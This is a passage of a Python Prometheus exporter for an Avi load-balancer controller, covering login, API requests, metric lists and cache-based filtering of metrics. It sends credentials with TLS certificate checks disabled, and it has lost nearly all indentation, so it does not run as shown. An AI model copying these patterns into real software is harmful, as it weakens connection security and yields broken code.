'l4_client.avg_tx_bytes',
'l4_client.max_open_conns',
'l4_client.avg_lossy_connections',
'l7_client.avg_complete_responses',
'l7_client.avg_client_data_transfer_time',
'l7_client.avg_client_txn_latency',
'l7_client.sum_application_response_time',
'l7_client.avg_resp_4xx_avi_errors',
'l7_client.avg_resp_5xx_avi_errors',
'l7_client.avg_resp_2xx',
'l7_client.avg_resp_4xx',
'l7_client.avg_resp_5xx',
'l4_client.avg_total_rtt',
'l7_client.avg_page_load_time',
'l7_client.apdexr',
'l7_client.avg_ssl_handshakes_new',
'l7_client.avg_ssl_connections',
'l7_client.sum_get_reqs',
'l7_client.sum_post_reqs',
'l7_client.sum_other_reqs',
'l7_client.avg_frustrated_responses',
'l7_client.avg_waf_attacks',
'l7_client.pct_waf_attacks',
'l7_client.sum_total_responses',
'l7_client.avg_waf_rejected',
'l7_client.avg_waf_evaluated',
'l7_client.avg_waf_matched',
'l7_client.avg_waf_disabled',
'l7_client.pct_waf_disabled',
'l7_client.avg_http_headers_count',
'l7_client.avg_http_headers_bytes',
'l7_client.pct_get_reqs',
'l7_client.pct_post_reqs',
'l7_client.avg_http_params_count',
'l7_client.avg_uri_length',
'l7_client.avg_post_bytes',
'dns_client.avg_complete_queries',
'dns_client.avg_domain_lookup_failures',
'dns_client.avg_tcp_queries',
'dns_client.avg_udp_queries',
'dns_client.avg_udp_passthrough_resp_time',
'dns_client.avg_unsupported_queries',
'dns_client.pct_errored_queries',
'dns_client.avg_domain_lookup_failures',
'dns_client.avg_avi_errors',
'dns_server.avg_complete_queries',
'dns_server.avg_errored_queries',
'dns_server.avg_tcp_queries',
'dns_server.avg_udp_queries',
'l4_server.avg_rx_pkts',
'l4_server.avg_tx_pkts',
'l4_server.avg_rx_bytes',
'l4_server.avg_tx_bytes',
'l4_server.avg_bandwidth',
'l7_server.avg_complete_responses',
'l4_server.avg_new_established_conns',
'l4_server.avg_pool_open_conns',
'l4_server.avg_pool_complete_conns',
'l4_server.avg_open_conns',
'l4_server.max_open_conns',
'l4_server.avg_errored_connections',
'l4_server.apdexc',
'l4_server.avg_total_rtt',
'l7_server.avg_resp_latency',
'l7_server.apdexr',
'l7_server.avg_application_response_time',
'l7_server.pct_response_errors',
'l7_server.avg_frustrated_responses',
'l7_server.avg_total_requests',
'healthscore.health_score_value'
]
default_vs_metric_list = ','.join(default_vs_metric_list)
#------
default_se_metric_list = [
'se_if.avg_bandwidth',
'se_stats.avg_connection_mem_usage',
'se_stats.avg_connections',
'se_stats.avg_connections_dropped',
'se_stats.avg_cpu_usage',
'se_stats.avg_disk1_usage',
'se_stats.avg_mem_usage',
'se_stats.avg_dynamic_mem_usage',
'se_stats.avg_persistent_table_usage',
'se_stats.avg_rx_bandwidth',
'se_if.avg_rx_bytes',
'se_if.avg_rx_pkts',
'se_if.avg_rx_pkts_dropped_non_vs',
'se_if.avg_tx_pkts',
'se_if.avg_tx_bytes',
'se_stats.avg_ssl_session_cache_usage',
'se_if.avg_connection_table_usage',
'se_stats.max_se_bandwidth',
'se_stats.avg_eth0_bandwidth',
'se_stats.pct_syn_cache_usage',
'se_stats.avg_packet_buffer_usage',
'se_stats.avg_packet_buffer_header_usage',
'se_stats.avg_packet_buffer_large_usage',
'se_stats.avg_packet_buffer_small_usage',
'healthscore.health_score_value'
]
default_se_metric_list = ','.join(default_se_metric_list)
#------
default_controller_metric_list = [
'controller_stats.avg_cpu_usage',
'controller_stats.avg_disk_usage',
'controller_stats.avg_mem_usage'
]
default_controller_metric_list = ','.join(default_controller_metric_list)
#----
default_pool_metric_list = [
'l4_server.avg_rx_pkts',
'l4_server.avg_tx_pkts',
'l4_server.avg_rx_bytes',
'l4_server.avg_tx_bytes',
'l4_server.avg_bandwidth',
'l7_server.avg_complete_responses',
'l4_server.avg_new_established_conns',
'l4_server.avg_pool_open_conns',
'l4_server.avg_pool_complete_conns',
'l4_server.avg_open_conns',
'l4_server.max_open_conns',
'l4_server.avg_errored_connections',
'l4_server.apdexc',
'l4_server.avg_total_rtt',
'l7_server.avg_resp_latency',
'l7_server.apdexr',
'l7_server.avg_application_response_time',
'l7_server.pct_response_errors',
'l7_server.avg_frustrated_responses',
'l7_server.avg_total_requests',
'healthscore.health_score_value'
]
default_pool_metric_list = ','.join(default_pool_metric_list)
#------------------------------------
def avi_login():
global login
try:
if r.get('avi_login') == None:
login = requests.post('https://%s/login' %avi_controller, verify=False, data={'username': avi_user, 'password': avi_pass},timeout=15)
r.set('avi_login',pickle.dumps(login))
return login
else:
cookies=dict()
login = pickle.loads(r.get('avi_login'))
if 'avi-sessionid' in login.cookies.keys():
cookies['avi-sessionid'] = login.cookies['avi-sessionid']
else:
cookies['sessionid'] = login.cookies['sessionid']
headers = ({"X-Avi-Tenant": "admin", 'content-type': 'application/json'})
resp = requests.get('https://%s/api/cluster' %avi_controller, verify=False, headers = headers,cookies=cookies,timeout=5)
if resp.status_code == 200:
return login
else:
login = requests.post('https://%s/login' %avi_controller, verify=False, data={'username': avi_user, 'password': avi_pass},timeout=15)
r.set('avi_login',pickle.dumps(login))
return login
except:
login = requests.post('https://%s/login' %avi_controller, verify=False, data={'username': avi_user, 'password': avi_pass},timeout=15)
r.set('avi_login',pickle.dumps(login))
return login
def avi_request(avi_api,tenant,api_version='17.2.1'):
cookies=dict()
if 'avi-sessionid' in login.cookies.keys():
cookies['avi-sessionid'] = login.cookies['avi-sessionid']
else:
cookies['sessionid'] = login.cookies['sessionid']
headers = ({'X-Avi-Tenant': '%s' %tenant, 'content-type': 'application/json', 'X-Avi-Version': '%s' %api_version})
return requests.get('https://%s/api/%s' %(avi_controller,avi_api), verify=False, headers = headers,cookies=cookies,timeout=50)
def avi_post(api_url,tenant,payload,api_version='17.2.1'):
cookies=dict()
if 'avi-sessionid' in login.cookies.keys():
cookies['avi-sessionid'] = login.cookies['avi-sessionid']
else:
cookies['sessionid'] = login.cookies['sessionid']
headers = ({"X-Avi-Tenant": "%s" %tenant, 'content-type': 'application/json','referer': 'https://%s' %avi_controller, 'X-CSRFToken': dict(login.cookies)['csrftoken'],'X-Avi-Version':'%s' %api_version})
cookies['csrftoken'] = login.cookies['csrftoken']
return requests.post('https://%s/api/%s' %(avi_controller,api_url), verify=False, headers = headers,cookies=cookies, data=json.dumps(payload),timeout=50)
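# Usage sketch (API paths are illustrative): avi_request('cluster', 'admin') issues a
# GET to https://<controller>/api/cluster using the cached session cookie, and
# avi_post(<api_url>, 'admin', payload) POSTs a JSON body the same way.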
def remove_version_specific_metrics(entity_type,metric_list):
try:
#----- Generate List of Available Metrics
if r.get('available_metrics_last_poll_time') == None:
r.set('available_metrics_last_poll_time', (time.time()-3601))
if r.get('metric_id_polling') == None:
r.set('metric_id_polling', 'False')
if (time.time() - float(r.get('available_metrics_last_poll_time')) > 3600 or r.get('available_metrics') == None) and r.get('metric_id_polling') == 'False':
r.set('metric_id_polling', 'True')
resp = avi_request('analytics/metric_id',login.json()['tenants'][0]['name']).json()
_available_metrics = {}
for m in resp['results']:
_available_metrics[m['name']]=m['entity_types']
r.set('available_metrics', pickle.dumps(_available_metrics))
r.set('available_metrics_last_poll_time', time.time())
r.set('metric_id_polling', 'False')
available_metrics = pickle.loads(r.get('available_metrics'))
_metrics = metric_list.replace(' ','').split(',')
_metric_list = []
if entity_type == 'virtualservice':
for m in _metrics:
if m.lower() in available_metrics:
if 'virtualservice' in available_metrics[m.lower()]:
_metric_list.append(m)
elif entity_type == 'serviceengine':
for m in _metrics:
if m.lower() in available_metrics:
if 'serviceengine' in available_metrics[m.lower()]:
_metric_list.append(m)
elif entity_type == 'pool':
for m in _metrics:
if m.lower() in available_metrics:
if 'pool' in available_metrics[m.lower()]:
_metric_list.append(m)
elif entity_type == 'controller':
for m in _metrics:
if m.lower() in available_metrics:
if 'cluster' in available_metrics[m.lower()]:
_metric_list.append(m)
_metric_list = ','.join(_metric_list)
return _metric_list
except:
r.set('metric_id_polling', 'False')
print(str(datetime.now())+' '+avi_controller+': remove_version_specific_metrics encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
#----------
def generate_params_list(request):
d=request.args.to_dict()
tenant_list = []
all_tenants = []
ten_inv = avi_request('tenant?fields=name&page_size=200','admin')
if ten_inv.status_code != 403:
resp = ten_inv.json()
# accumulate paged results locally; Response.json() re-parses the body on every call
tenant_results = list(resp['results'])
page_number = 1
while 'next' in resp:
page_number += 1
resp = avi_request('tenant?fields=name&page_size=200&page='+str(page_number),'admin').json()
tenant_results.extend(resp['results'])
for t in tenant_results:
all_tenants.append(t['name'])
else:
for t in login.json()['tenants']:
all_tenants.append(t['name'])
if 'tenant' in d:
for t in all_tenants:
if t.lower() in request.args.get('tenant').lower().split(','):
tenant_list.append(t)
else:
for t in all_tenants:
tenant_list.append(t)
if 'cloud' in d:
cloud_list = request.args.get('cloud').lower().split(',')
else:
cloud_list = ['*']
if 'entity_uuid' in d:
uuid_list = request.args.get('entity_uuid').lower().split(',')
else:
uuid_list = '*'
r.set('tenant_list', pickle.dumps(all_tenants))
return tenant_list,cloud_list, uuid_list
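# For a scrape request carrying the (hypothetical) query string
# ?tenant=admin,finance&cloud=Default-Cloud this returns
# (['admin', 'finance'], ['default-cloud'], '*'): tenants keep the controller's
# casing, clouds are lowercased, and omitted params fall back to all tenants,
# the '*' cloud wildcard, or the '*' uuid wildcard respectively.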
#---------------------------------------------------------------------------------------------------------
#-----------------------------------
#----- Service engine statistics
#----- build lists for the requested params; allows multiple job servers to scrape different metrics
def serviceengine_metrics_params(request):
if r.get('se_entity_uuid') == None:
r.set('se_entity_uuid',pickle.dumps({}))
if r.get('se_metric_id') == None:
r.set('se_metric_id',pickle.dumps({}))
if r.get('se_tenant') == None:
r.set('se_tenant',pickle.dumps({}))
if r.get('se_cloud') == None:
r.set('se_cloud',pickle.dumps({}))
if r.get('se_runtime') == None:
r.set('se_runtime',pickle.dumps({}))
d=request.args.to_dict()
tenant_list,cloud_list,uuid_list = generate_params_list(request)
if 'metric_id' in d:
metric_id = request.args.get('metric_id').lower()
else:
metric_id = default_se_metric_list
se_metric_list = remove_version_specific_metrics('serviceengine',metric_id)
_metric_list = se_metric_list.split(',')
#---- define metric id list
_se_metric_id = pickle.loads(r.get('se_metric_id'))
for m in _metric_list:
_se_metric_id[m] = time.time()
_removal = []
for m in _se_metric_id:
if (time.time() - _se_metric_id[m]) > (metric_refresh_interval*2):
_removal.append(m)
for m in _removal:
_se_metric_id.pop(m, None)
r.set('se_metric_id', pickle.dumps(_se_metric_id))
#---- define tenant list
_tenant_dict = pickle.loads(r.get('se_tenant'))
for t in tenant_list:
_tenant_dict[t] = time.time()
_removal = []
for t in _tenant_dict:
if (time.time() - _tenant_dict[t]) > (metric_refresh_interval*2):
_removal.append(t)
for t in _removal:
_tenant_dict.pop(t, None)
r.set('se_tenant', pickle.dumps(_tenant_dict))
#---- define se runtime for tenant
_se_runtime = pickle.loads(r.get('se_runtime'))
if 'runtime' in d:
if request.args.get('runtime').lower() == 'true':
for t in _tenant_dict:
_se_runtime[t] = time.time()
_removal = []
for t in _se_runtime:
if (time.time() - _se_runtime[t]) > (metric_refresh_interval*2):
_removal.append(t)
for t in _removal:
_se_runtime.pop(t, None)
r.set('se_runtime', pickle.dumps(_se_runtime))
#---- define cloud list
_cloud_dict = pickle.loads(r.get('se_cloud'))
for c in cloud_list:
_cloud_dict[c] = time.time()
_removal = []
for c in _cloud_dict:
if (time.time() - _cloud_dict[c]) > (metric_refresh_interval*2):
_removal.append(c)
for c in _removal:
_cloud_dict.pop(c, None)
r.set('se_cloud', pickle.dumps(_cloud_dict))
#---- define uuid list
_uuid_dict = pickle.loads(r.get('se_entity_uuid'))
for u in uuid_list:
_uuid_dict[u] = time.time()
_removal = []
for u in _uuid_dict:
if (time.time() - _uuid_dict[u]) > (metric_refresh_interval*2):
_removal.append(u)
for u in _removal:
_uuid_dict.pop(u, None)
r.set('se_entity_uuid', pickle.dumps(_uuid_dict))
#---- filter metrics from the cache to return only what's requested in the Prometheus request
def serviceengine_filter_metrics(request):
d=request.args.to_dict()
se_metrics = pickle.loads(r.get('se_metrics'))
se_metrics_runtime = pickle.loads(r.get('se_metrics_runtime'))
tenant_list,cloud_list,uuid_list = generate_params_list(request)
if 'metric_id' in d:
se_metric_list = request.args.get('metric_id').lower()
else:
se_metric_list = default_se_metric_list
se_metric_list = remove_version_specific_metrics('serviceengine',se_metric_list)
_metric_list = se_metric_list.replace('.','_').split(',')
if 'runtime' in d:
if request.args.get('runtime').lower() == 'true':
_metric_list = _metric_list + se_metrics_runtime
#----- filter results based upon request params
list_to_remove = []
#----- filter metrics
for l in se_metrics:
if '# HELP ' in l or '# TYPE ' in l:
if l.split(' ')[2] not in _metric_list:
list_to_remove.append(l)
else:
if l.split(' ')[0] not in _metric_list:
list_to_remove.append(l)
for e in list_to_remove:
se_metrics.remove(e)
#----- filter by UUID
if uuid_list !='*':
list_to_remove = []
for l in se_metrics:
if "# " not in l:
if l.split('uuid="')[1].split('"',1)[0] not in uuid_list:
list_to_remove.append(l)
for e in list_to_remove:
se_metrics.remove(e)
#----- filter by tenant
else:
list_to_remove = []
for l in se_metrics:
if "# " not in l:
if l.split('tenant="')[1].split('"',1)[0] not in tenant_list:
list_to_remove.append(l)
for e in list_to_remove:
se_metrics.remove(e)
#----- filter by cloud
if '*' not in cloud_list:
list_to_remove = []
for l in se_metrics:
if "# " not in l:
if l.split('cloud="')[1].split('"',1)[0] not in cloud_list:
list_to_remove.append(l)
for e in list_to_remove:
se_metrics.remove(e)
#----- remove empty comment lines
list_to_remove = []
_mlist = []
for l in se_metrics:
if "# " not in l:
_mlist.append(l.split(' ')[0])
for l in se_metrics:
if "# " in l:
if l.split(' ')[2] not in _mlist:
list_to_remove.append(l)
if len(list_to_remove) > 0:
for e in list_to_remove:
se_metrics.remove(e)
#-----
se_metrics.append('\n')
se_metrics = '\n'.join(se_metrics)
return se_metrics
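# The cached entries are Prometheus exposition-format lines; the filters above
# key off the uuid="...", tenant="..." and cloud="..." labels. An illustrative
# (placeholder) sample line:
#   se_stats_avg_cpu_usage{uuid="se-uuid",tenant="admin",cloud="Default-Cloud"} 12.0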
def serviceengine_metrics(request):
try:
if r.get('se_last_poll_time') == None:
r.set('se_last_poll_time', (time.time()-(metric_refresh_interval+10)))
if r.get('se_last_poll_start_time') == None:
r.set('se_last_poll_start_time', (time.time()-(metric_refresh_interval+20)))
if r.get('se_metrics') == None:
r.set('se_metrics',pickle.dumps([]))
if r.get('se_metrics_runtime') == None:
r.set('se_metrics_runtime',pickle.dumps([]))
if r.get('se_polling') == None:
r.set('se_polling', 'False')
if time.time() - float(r.get('se_last_poll_start_time')) > metric_refresh_interval and r.get('se_polling') == 'False':
r.set('se_polling','True')
serviceengine_metrics_params(request)
if wait_for_cache == False:
se_metrics = serviceengine_filter_metrics(request)
p = Process(target = serviceengine_static.refresh_serviceengine_metrics, args = (r,login,avi_controller,))
p.start()
else:
serviceengine_static.refresh_serviceengine_metrics(r,login,avi_controller)
se_metrics = serviceengine_filter_metrics(request)
return se_metrics
else:
print(str(datetime.now())+' =====> Using cached Serviceengine metrics')
serviceengine_metrics_params(request)
se_metrics = serviceengine_filter_metrics(request)
if time.time() - float(r.get('se_last_poll_time')) > (metric_refresh_interval * 2):
r.set('se_metrics',pickle.dumps([]))
if r.get('se_polling') == 'True':
r.set('se_polling', 'False')
return se_metrics
except:
print(str(datetime.now())+' '+avi_controller+': func serviceengine_metrics encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return False
#---------------------------------------------------------------------------------------------------------
#---------------------------------------------------------------------------------------------------------
#-----------------------------------
#----- Virtual service statistics - STATIC prometheus setup
#----- build lists for the requested params; allows multiple job servers to scrape different metrics
def virtualservice_metrics_params(request):
if r.get('vs_entity_uuid') == None:
r.set('vs_entity_uuid',pickle.dumps({}))
if r.get('vs_metric_id') == None:
r.set('vs_metric_id',pickle.dumps({}))
if r.get('vs_tenant') == None:
r.set('vs_tenant',pickle.dumps({}))
if r.get('vs_cloud') == None:
r.set('vs_cloud',pickle.dumps({}))
d=request.args.to_dict()
tenant_list,cloud_list,uuid_list = generate_params_list(request)
if 'metric_id' in d:
metric_id = request.args.get('metric_id').lower()
else:
metric_id = default_vs_metric_list
vs_metric_list = remove_version_specific_metrics('virtualservice',metric_id)
_metric_list = vs_metric_list.split(',')
#---- define metric id list
_vs_metric_id = pickle.loads(r.get('vs_metric_id'))
for m in _metric_list:
_vs_metric_id[m] = time.time()
_removal = []
for m in _vs_metric_id:
if (time.time() - _vs_metric_id[m]) > (metric_refresh_interval*2):
_removal.append(m)
for m in _removal:
_vs_metric_id.pop(m, None)
r.set('vs_metric_id', pickle.dumps(_vs_metric_id))
#---- define tenant list
_tenant_dict = pickle.loads(r.get('vs_tenant'))
for t in tenant_list:
_tenant_dict[t] = time.time()
_removal = []
for t in _tenant_dict:
if (time.time() - _tenant_dict[t]) > (metric_refresh_interval*2):
_removal.append(t)
for t in _removal:
_tenant_dict.pop(t, None)
r.set('vs_tenant', pickle.dumps(_tenant_dict))
#---- define cloud list
_cloud_dict = pickle.loads(r.get('vs_cloud'))
for c in cloud_list:
_cloud_dict[c] = time.time()
_removal = []
for c in _cloud_dict:
if (time.time() - _cloud_dict[c]) > (metric_refresh_interval*2):
_removal.append(c)
for c in _removal:
_cloud_dict.pop(c, None)
r.set('vs_cloud', pickle.dumps(_cloud_dict))
#---- define uuid list
_uuid_dict = pickle.loads(r.get('vs_entity_uuid'))
for u in uuid_list:
_uuid_dict[u] = time.time()
_removal = []
for u in _uuid_dict:
if (time.time() - _uuid_dict[u]) > (metric_refresh_interval*2):
_removal.append(u)
for u in _removal:
_uuid_dict.pop(u, None)
r.set('vs_entity_uuid', pickle.dumps(_uuid_dict))
#---- filter metrics from the cache to return only what's requested in the Prometheus request
def virtualservice_filter_metrics(request):
d=request.args.to_dict()
vs_metrics = pickle.loads(r.get('vs_metrics'))
tenant_list,cloud_list,uuid_list = generate_params_list(request)
if 'metric_id' in d:
vs_metric_list = request.args.get('metric_id').lower()
else:
vs_metric_list = default_vs_metric_list
vs_metric_list = remove_version_specific_metrics('virtualservice',vs_metric_list)
_metric_list = vs_metric_list.replace('.','_').split(',')
#----- filter results based upon request params
list_to_remove = []
#----- filter metrics
for l in vs_metrics:
if '# HELP ' in l or '# TYPE ' in l:
if l.split(' ')[2] not in _metric_list:
list_to_remove.append(l)
else:
if l.split(' ')[0] not in _metric_list:
list_to_remove.append(l)
for e in list_to_remove:
vs_metrics.remove(e)
#----- filter by UUID
if uuid_list !='*':
list_to_remove = []
for l in vs_metrics:
if "# " not in l:
if l.split('uuid="')[1].split('"',1)[0] not in uuid_list:
list_to_remove.append(l)
for e in list_to_remove:
vs_metrics.remove(e)
#----- filter by tenant
else:
list_to_remove = []
for l in vs_metrics:
if "# " not in l:
if l.split('tenant="')[1].split('"',1)[0] not in tenant_list:
list_to_remove.append(l)
for e in list_to_remove:
vs_metrics.remove(e)
#----- filter by cloud
if '*' not in cloud_list:
list_to_remove = []
for l in vs_metrics:
if "# " not in l:
if l.split('cloud="')[1].split('"',1)[0] not in cloud_list:
list_to_remove.append(l)
for e in list_to_remove:
vs_metrics.remove(e)
#----- remove empty comment lines
list_to_remove = []
_mlist = []
for l in vs_metrics:
if "# " not in l:
_mlist.append(l.split(' ')[0])
for l in vs_metrics:
if "# " in l:
if l.split(' ')[2] not in _mlist:
list_to_remove.append(l)
if len(list_to_remove) > 0:
for e in list_to_remove:
vs_metrics.remove(e)
#-----
vs_metrics.append('\n')
vs_metrics = '\n'.join(vs_metrics)
return vs_metrics
#----------
def virtualservice_metrics(request):
try:
if r.get('vs_last_poll_time') == None:
r.set('vs_last_poll_time', (time.time()-(metric_refresh_interval+10)))
if r.get('vs_last_poll_start_time') == None:
r.set('vs_last_poll_start_time', (time.time()-(metric_refresh_interval+20)))
if r.get('vs_metrics') == None:
r.set('vs_metrics',pickle.dumps([]))
if r.get('vs_polling') == None:
r.set('vs_polling', 'False')
if time.time() - float(r.get('vs_last_poll_start_time')) > metric_refresh_interval and r.get('vs_polling') == 'False':
r.set('vs_polling','True')
virtualservice_metrics_params(request)
if wait_for_cache == False:
vs_metrics = virtualservice_filter_metrics(request)
p = Process(target = virtualservice_static.refresh_vs_metrics, args = (r,login,avi_controller,))
p.start()
else:
virtualservice_static.refresh_vs_metrics(r,login,avi_controller)
vs_metrics = virtualservice_filter_metrics(request)
return vs_metrics
else:
print(str(datetime.now())+' =====> Using cached Virtualservice metrics')
virtualservice_metrics_params(request)
vs_metrics = virtualservice_filter_metrics(request)
if time.time() - float(r.get('vs_last_poll_time')) > (metric_refresh_interval * 2):
r.set('vs_metrics',pickle.dumps([]))
if r.get('vs_polling') == 'True':
r.set('vs_polling', 'False')
return vs_metrics
except:
print(str(datetime.now())+' '+avi_controller+': func virtualservice_metrics encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return False
#---------------------------------------------------------------------------------------------------------
#---------------------------------------------------------------------------------------------------------
#-----------------------------------
#----- Virtual service statistics - Prometheus service discovery
def update_servicediscovery_targets(request):
try:
if r.get('sd_targets') == None:
r.set('sd_targets',pickle.dumps({}))
if r.get('sd_names') == None:
r.set('sd_names', pickle.dumps({}))
sd_names = pickle.loads(r.get('sd_names'))
sd_targets = pickle.loads(r.get('sd_targets'))
d=request.args.to_dict()
tenant = request.args.get('kubernetes_namespace')
vs_name = request.args.get('virtualservice')
if 'metric_id' in d:
sd_metric_list = request.args.get('metric_id').lower()
else:
sd_metric_list = default_vs_metric_list
if tenant not in sd_names:
sd_names[tenant] = {}
if 'extra_metrics' in d:
extra_metrics = request.args.get('extra_metrics')
sd_metric_list = (sd_metric_list+','+extra_metrics).replace(' ','')
sd_metric_list = remove_version_specific_metrics('virtualservice',sd_metric_list)
sd_metric_list = sd_metric_list.split(',')
#---- remove unnecessary metrics
if vs_name in sd_names[tenant]:
uuid = sd_names[tenant][vs_name]
sd_targets[uuid]['vs_metric_list'] = sd_metric_list
r.set('sd_targets',pickle.dumps(sd_targets))
else:
print(str(datetime.now())+' =====> New VS discovered: %s' %vs_name)
resp = avi_request('virtualservice?name=%s&fields=cloud_ref,tenant_ref&include_name=true' %vs_name, tenant)
if resp.status_code == 200:
if resp.json()['count'] == 1:
cloud = resp.json()['results'][0]['cloud_ref'].split('#')[1]
entity_uuid = resp.json()['results'][0]['uuid']
temp_name = resp.json()['results'][0]['name']
sd_names[tenant][temp_name] = entity_uuid
r.set('sd_names', pickle.dumps(sd_names))
sd_targets[entity_uuid] = {'vs_metric_list': sd_metric_list, 'cloud': cloud, 'lastquery': time.time(), 'lastresponse': time.time()}
r.set('sd_targets', pickle.dumps(sd_targets))
else:
print(str(datetime.now())+' =====> ERROR update_servicediscovery_targets: %s' %resp.text)
return ['ERROR',resp.status_code,resp.text]
return ['SUCCESS']
except:
print(str(datetime.now())+' '+avi_controller+': func update_servicediscovery_targets encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return False
#----------
#----------
def virtualservice_servicediscovery_metrics(request):
try:
if r.get('sd_polling') == None:
r.set('sd_polling','False')
if r.get('sd_last_poll_time') == None:
r.set('sd_last_poll_time',(time.time()-(metric_refresh_interval+10)))
if r.get('sd_last_poll_start_time') == None:
r.set('sd_last_poll_start_time',(time.time()-(metric_refresh_interval+20)))
if r.get('sd_metrics') == None:
r.set('sd_metrics', pickle.dumps([]))
status = update_servicediscovery_targets(request)
if status[0] != 'SUCCESS':
return status[0]+'|'+str(status[1])+'|'+status[2]
else:
if time.time() - float(r.get('sd_last_poll_start_time')) > metric_refresh_interval and r.get('sd_polling') == 'False':
r.set('sd_polling','True')
if wait_for_cache == False:
p = Process(target = servicediscovery.update_servicediscovery_metric_cache_multiprocess, args = (r,login,avi_controller,metric_refresh_interval,))
p.start()
else:
servicediscovery.update_servicediscovery_metric_cache_multiprocess(r,login,avi_controller,metric_refresh_interval)
else:
print(str(datetime.now())+' =====> Using cached Servicediscovery metrics')
sd_names = pickle.loads(r.get('sd_names'))
sd_targets = pickle.loads(r.get('sd_targets'))
sd_metrics = pickle.loads(r.get('sd_metrics'))
tenant = request.args.get('kubernetes_namespace')
vs_name = request.args.get('virtualservice')
uuid = sd_names[tenant][vs_name]
#prom_metrics = ''
prom_metrics = ['\n']
for s in sd_metrics:
for v in s:
if v == uuid:
for m in s[v]:
if 'data' in m:
temp_tags = ''
#----- check if the metric is desired for the vs
if m['header']['name'] in sd_targets[uuid]['vs_metric_list']:
metric_name = m['header']['name'].replace('.','_').replace('-','_')
metric_description = m['header']['metric_description']
metric_value = m['data'][0]['value']
temp_payload = {}
temp_payload['name'] = vs_name
temp_payload['uuid'] = uuid
temp_payload['cloud'] = sd_targets[uuid]['cloud']
temp_payload['tenant'] = tenant
temp_payload['entity_type'] = 'virtualservice'
for e in temp_payload:
temp_tags=temp_tags+(str(e+'="'+temp_payload[e]+'",'))
temp_tags = '{'+temp_tags.rstrip(',')+'}'
#prom_metrics = prom_metrics+'\n'+'# HELP '+metric_name+' '+metric_description
#prom_metrics = prom_metrics+'\n'+'# TYPE '+metric_name+' gauge'
#prom_metrics = prom_metrics+'\n'+metric_name+''+temp_tags+' '+str(metric_value)
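                                    #----- the ' 01'/' 02' markers make each metric's HELP and TYPE lines sort
                                    #----- directly ahead of its sample line after the set()/sorted() dedup below;
                                    #----- the markers are stripped again in the loop that follows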
prom_metrics.append('%s 01# HELP %s %s' %(metric_name,metric_name, metric_description))
prom_metrics.append('%s 02# TYPE %s gauge' %(metric_name,metric_name))
prom_metrics.append('%s %s %s' %(metric_name,temp_tags,str(metric_value)))
sd_targets[uuid]['lastquery'] = time.time()
sd_targets[uuid]['lastresponse'] = time.time()
r.set('sd_targets',pickle.dumps(sd_targets))
#prom_metrics = prom_metrics+'\n'
prom_metrics = list(set(prom_metrics))
prom_metrics = sorted(prom_metrics)
for idx, item in enumerate(prom_metrics):
if '01#' in item:
item = item.split('01',1)[1]
prom_metrics[idx] = item
elif '02#' in item:
item = item.split('02',1)[1]
prom_metrics[idx] = item
prom_metrics.append('\n')
prom_metrics = '\n'.join(prom_metrics)
if time.time() - float(r.get('sd_last_poll_time')) > (metric_refresh_interval * 2):
                r.set('sd_metrics',pickle.dumps([]))
if r.get('sd_polling') == 'True':
r.set('sd_polling', 'False')
return prom_metrics
except:
r.set('sd_polling','False')
print(str(datetime.now())+' '+avi_controller+': func virtualservice_servicediscovery_metrics encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return False
#---------------------------------------------------------------------------------------------------------
#---------------------------------------------------------------------------------------------------------
#-----------------------------------
#----- Pool statistics
#----- build lists for requested params, allows multiple job servers to scrape different metrics
def pool_metrics_params(request):
if r.get('pool_entity_uuid') == None:
r.set('pool_entity_uuid',pickle.dumps({}))
if r.get('pool_metric_id') == None:
r.set('pool_metric_id',pickle.dumps({}))
if r.get('pool_tenant') == None:
r.set('pool_tenant',pickle.dumps({}))
if r.get('pool_cloud') == None:
r.set('pool_cloud',pickle.dumps({}))
d=request.args.to_dict()
tenant_list,cloud_list,uuid_list = generate_params_list(request)
if 'metric_id' in d:
metric_id = request.args.get('metric_id').lower()
else:
metric_id = default_pool_metric_list
pool_metric_list = remove_version_specific_metrics('pool',metric_id)
_metric_list = pool_metric_list.split(',')
#---- define metric id list
_pool_metric_id = pickle.loads(r.get('pool_metric_id'))
for m in _metric_list:
_pool_metric_id[m] = time.time()
_removal = []
for m in _pool_metric_id:
if (time.time() - _pool_metric_id[m]) > (metric_refresh_interval*2):
_removal.append(m)
for m in _removal:
_pool_metric_id.pop(m, None)
r.set('pool_metric_id', pickle.dumps(_pool_metric_id))
#---- define tenant list
_tenant_dict = pickle.loads(r.get('pool_tenant'))
for t in tenant_list:
_tenant_dict[t] = time.time()
_removal = []
for t in _tenant_dict:
if (time.time() - _tenant_dict[t]) > (metric_refresh_interval*2):
_removal.append(t)
for t in _removal:
_tenant_dict.pop(t, None)
r.set('pool_tenant', pickle.dumps(_tenant_dict))
#---- define cloud list
_cloud_dict = pickle.loads(r.get('pool_cloud'))
for c in cloud_list:
_cloud_dict[c] = time.time()
_removal = []
for c in _cloud_dict:
if (time.time() - _cloud_dict[c]) > (metric_refresh_interval*2):
_removal.append(c)
for c in _removal:
_cloud_dict.pop(c, None)
r.set('pool_cloud', pickle.dumps(_cloud_dict))
#---- define uuid list
_uuid_dict = pickle.loads(r.get('pool_entity_uuid'))
for u in uuid_list:
_uuid_dict[u] = time.time()
_removal = []
for u in _uuid_dict:
if (time.time() - _uuid_dict[u]) > (metric_refresh_interval*2):
_removal.append(u)
for u in _removal:
_uuid_dict.pop(u, None)
r.set('pool_entity_uuid', pickle.dumps(_uuid_dict))
#---- filters metrics from cache to return only what's requested in the Prometheus requests
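#---- Illustrative note (metric names here are assumptions, not taken from this file): the cached entries are
#---- expected to be Prometheus exposition lines such as
#----   # HELP avi_pool_avg_bandwidth avg_bandwidth
#----   # TYPE avi_pool_avg_bandwidth gauge
#----   avi_pool_avg_bandwidth{name="pool-1",uuid="pool-abc",cloud="Default-Cloud",tenant="admin",entity_type="pool"} 1024.0
#---- so comment lines are matched on split(' ')[2] and sample lines on split(' ')[0] and their label values.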
def pool_filter_metrics(request):
d=request.args.to_dict()
pool_metrics = pickle.loads(r.get('pool_metrics'))
tenant_list,cloud_list,uuid_list = generate_params_list(request)
if 'metric_id' in d:
pool_metric_list = request.args.get('metric_id').lower()
else:
pool_metric_list = default_pool_metric_list
